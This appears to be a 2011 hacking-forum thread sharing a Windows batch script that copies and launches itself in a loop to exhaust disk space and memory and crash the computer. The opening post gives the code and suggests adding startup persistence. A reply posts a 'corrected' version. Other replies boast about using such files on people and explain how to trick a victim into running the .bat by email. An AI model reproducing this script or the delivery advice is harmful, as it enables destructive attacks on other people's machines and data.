Login Register






very dangerous batch, will destroy your computer!!!! filter_list
Author
Message
very dangerous batch, will destroy your computer!!!! #1
what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

now, if you really wanted to make it a bad batch file, you could have it copy itself to startup, so that when you start up, the horror starts all over again, ON TOP OF ITSELF!!!!.



let me tell you, i let it run only five seconds, and that's b/c it took almost five seconds for the shutdown, and i deleted almost 9 megabytes of diskspace used by just BATCH FILES (which are 1 kb a PIECE!!) just imagine what would have happened to me if i let it run for just one minute...it'd be GIGS and probably well past GIGS in 10 minutes.

so, be careful guys, don't run it on yourself unless you have a virtual machine to limit your disk space used (even that might not be safe).

my warning, DON'T DO ANYTHING STUPID!

Code:
@echo off :A SET /A X=%RANDOM%%%1999999999% type damage.bat >> %x%.bat start %x%.bat goto:A

i am not responsible for any idiots who decide to run this code on his computer .


RE: very dangerous batch, will destroy your computer!!!! #2
haha ive got so many of these codes, just waiting for that person to piss me off and BOOOOOOOOM!!!!!!!!!!!Wink


RE: very dangerous batch, will destroy your computer!!!! #3
how i can send batch to another person ? BiggrinDDDDD


RE: very dangerous batch, will destroy your computer!!!! #4
(04-07-2011, 06:51 AM)Shadwow Wrote: what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

now, if you really wanted to make it a bad batch file, you could have it copy itself to startup, so that when you start up, the horror starts all over again, ON TOP OF ITSELF!!!!.



let me tell you, i let it run only five seconds, and that's b/c it took almost five seconds for the shutdown, and i deleted almost 9 megabytes of diskspace used by just BATCH FILES (which are 1 kb a PIECE!!) just imagine what would have happened to me if i let it run for just one minute...it'd be GIGS and probably well past GIGS in 10 minutes.

so, be careful guys, don't run it on yourself unless you have a virtual machine to limit your disk space used (even that might not be safe).

my warning, DON'T DO ANYTHING STUPID!

Code:
@echo off :A SET /A X=%RANDOM%%%1999999999% type damage.bat >> %x%.bat start %x%.bat goto:A

i am not responsible for any idiots who decide to run this code on his computer .

u typed wrongly... it should be "goto A" without "" Smile

great post.. but the code is alittle confuse. may be u can make it shorter.
(This post was last modified: 06-13-2011, 09:07 AM by GodFather.)


RE: very dangerous batch, will destroy your computer!!!! #5
Hmm.. That code wouldn't work. You've got two errors there. Here's correct and less confusing code:

Code:
@echo off :a set x=%random%.bat echo %random%>>%x% start %x%.bat goto a
[Image: nNICR.jpg]
Creds to bluedog

For a list of my contributions (includes tutorials). Click here.

If you'd like to apply for Heat, please click here.


RE: very dangerous batch, will destroy your computer!!!! #6
These are very simple files to make, Yet powerful at the same time be careful if anyone wants any decent ones ask I have alot.


RE: very dangerous batch, will destroy your computer!!!! #7
(04-07-2011, 06:51 AM)Shadwow Wrote: what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

What causes it to require a reinstall? It doesn't place itself in any of the startup locations. And if it did safe mode would be able to defeat it easily.


RE: very dangerous batch, will destroy your computer!!!! #8
Mmm... thank you for this.... this will surely be helpful


RE: very dangerous batch, will destroy your computer!!!! #9
(05-12-2011, 01:31 PM)wannabe Wrote: how i can send batch to another person ? BiggrinDDDDD

Make a program and send him or if his noob just email him the name.bat file and ask him to run. And enjoy the lulz.

OT: Nice share.
Spoiler:
[Image: unledbyds.png]


RE: very dangerous batch, will destroy your computer!!!! #10
(05-12-2011, 01:31 PM)wannabe Wrote: how i can send batch to another person ? BiggrinDDDDD

Make a program and send him or if his noob just email him the name.bat file and ask him to run. And enjoy the lulz.

OT: Nice share.
Spoiler:
[Image: unledbyds.png]